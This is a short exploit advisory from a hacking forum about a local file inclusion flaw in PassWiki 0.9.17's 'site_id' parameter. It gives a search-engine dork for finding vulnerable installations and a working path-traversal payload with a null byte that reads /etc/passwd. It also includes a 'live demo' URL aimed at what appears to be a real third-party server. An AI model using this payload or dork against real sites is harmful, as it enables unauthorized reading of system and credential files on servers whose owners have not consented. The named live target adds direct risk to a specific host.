PassWiki versions 0.9.17 and below suffer from a local file inclusion vulnerability. This is a five month old vulnerability that remains unpatched as new versions come out. Consumer beware!
8c02bbaa5018efa02295c143cae09f3f5d92e2b4db38cc33d72126868b1316d4
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR-MAGE-JeTFyrE- DON-Outlawz-aymbrbr #
# and all darkc0de and DarkTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & darktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: PassWiki 0.9.17 "site_id" Local File Inclusion Vulnerability
#
#
###########################################################
#
# d0rk: "powered by PassWiki 0.9.17"
#
###########################################################
This is taken from the original advisory which was provided by mozi2weed[at]yahoo[dot]com, here http://milw0rm.com/exploits/5704.
The affected version was 0.9.16 RC 3 and the solution was suggested to upgrade to version 0.9.17, which can be found here
http://secunia.com/advisories/30496/
POC:
http://site.com/[path]/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
Live Dem0:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
###########################################################
#
# Bug discovered : 20 Oct 2008
###########################################################